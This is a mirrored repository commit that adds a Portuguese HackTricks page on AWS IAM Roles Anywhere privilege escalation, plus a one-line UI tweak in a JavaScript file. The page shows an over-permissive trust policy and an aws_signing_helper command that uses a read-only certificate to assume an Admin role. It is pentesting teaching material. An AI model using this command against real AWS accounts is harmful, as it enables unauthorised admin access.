gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-06 04:41:21 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

Browse Source
This commit is contained in:
Translator
2025-06-24 14:00:30 +00:00
parent 66b54d498e
commit 316c884ffd
2 changed files with 43 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

42
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md Normal file
View File

@@ -0,0 +1,42 @@
# AWS - IAM Roles Anywhere Privesc
{{#include ../../../../banners/hacktricks-training.md}}
AWS IAM RolesAnywhere permite que cargas de trabalho fora da AWS assumam funções IAM usando certificados X.509. Mas quando as políticas de confiança não são adequadamente definidas, elas podem ser abusadas para escalonamento de privilégios.
Esta política carece de restrições sobre quais âncoras de confiança ou atributos de certificado são permitidos. Como resultado, qualquer certificado vinculado a qualquer âncora de confiança na conta pode ser usado para assumir esta função.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "rolesanywhere.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:SetSourceIdentity",
"sts:TagSession"
]
}
]
}
```
Para privesc, o `aws_signing_helper` é necessário de https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
Então, usando um certificado válido, o atacante pode pivotar para o papel de maior privilégio.
```bash
aws_signing_helper credential-process \
--certificate readonly.pem \
--private-key readonly.key \
--trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
--profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
--role-arn arn:aws:iam::123456789012:role/Admin
```
### Referências
- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
{{#include ../../../../banners/hacktricks-training.md}}

2
theme/ai.js
View File

@@ -226,7 +226,7 @@
`threadId=${threadId}; Path=/; Secure; SameSite=Strict; Max-Age=7200`;
} catch (e) {
console.error("Error creating threadId:", e);
alert("Failed to initialise the conversation. Please refresh.");
console.log("Failed to initialise the conversation. Please refresh.");
throw e;
}
}